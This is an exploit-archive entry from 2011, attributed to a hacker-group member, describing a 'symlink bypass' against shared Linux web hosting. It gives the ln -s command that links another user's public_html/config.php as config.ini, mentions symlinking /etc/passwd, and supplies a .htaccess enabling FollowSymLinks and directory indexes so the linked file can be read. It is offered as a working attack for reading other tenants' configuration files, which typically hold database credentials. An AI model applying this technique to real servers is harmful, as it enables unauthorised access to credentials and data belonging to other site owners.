Symlink bypass Vulnerability

2011-05-06T00:00:00
ID 1337DAY-ID-16027
Type zdt
Reporter 3H34N
Modified 2011-05-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #############################################
mail : [email protected]
#(+) Exploit Title: symlink bypass vulnerability
#(+) Author       : 3H34N
#(+) E-mail       : [email protected]
#(+) Platform     : Tested on: linux

############################################
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:

then symlink with this command:

ln -s /home/user/public_html/config.php config.ini

you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
########################################################################

.htaccess file:

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm

########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~
Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~  S3Ri0uS and
all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################



#  0day.today [2018-01-10]  #